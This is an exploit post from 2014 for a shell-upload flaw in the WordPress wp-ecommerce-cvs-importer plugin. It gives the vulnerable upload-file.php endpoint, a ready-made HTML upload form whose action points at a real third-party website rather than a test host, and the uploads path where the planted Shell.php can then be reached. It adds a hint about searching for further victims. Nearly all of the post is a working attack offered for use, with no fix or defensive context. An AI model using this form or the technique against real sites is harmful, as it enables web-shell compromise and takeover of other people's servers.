facebook facebook twitter rss

WordPress wp-ecommerce-cvs-importer plugin shell upload vulnerability

Author: SERWAN , Published: 15-09-2014
# Exploit Title: WordPress wp-ecommerce-cvs-importer plugin shell upload vulnerability
# Google Dork: Use ur brain
# Date: 11/09/2014
# Exploit Author: SERWAN
# Software Link: http://wordpress.org/support/plugin/wp-ecommerce-cvs-importer
# Version: [app version - REQUIRED]
# Tested on: Linux
# Greetz - All Kurdish Hackers
##########################################################################

Poc & Eploit

http://localhost/wordpress/wp-content/plugins/wp-ecommerce-cvs-importer/upload/upload-file.php

Tool

<center>
<img src='http://z5.ifrm.com/30192/69/0/p1163951/kurdistan_flag.gif'/>
<br>
<br>
WordPress wp-ecommerce-cvs-importer plugin shell upload vulnerability By SERWAN
<br>
<br>
<form enctype="multipart/form-data"action="http://steelnotesmagazine.com/test/wp-content/plugins/wp-ecommerce-cvs-importer/upload/upload-file.php" method="post">
<input name="uploadfile" type="file" />
<input type="submit" value="upload" />
</form>
</center>

File access

http://localhost/wordpress/wp-content/uploads/wpsc/product_images/Shell.php

##########################################################################

Like us on Facebook :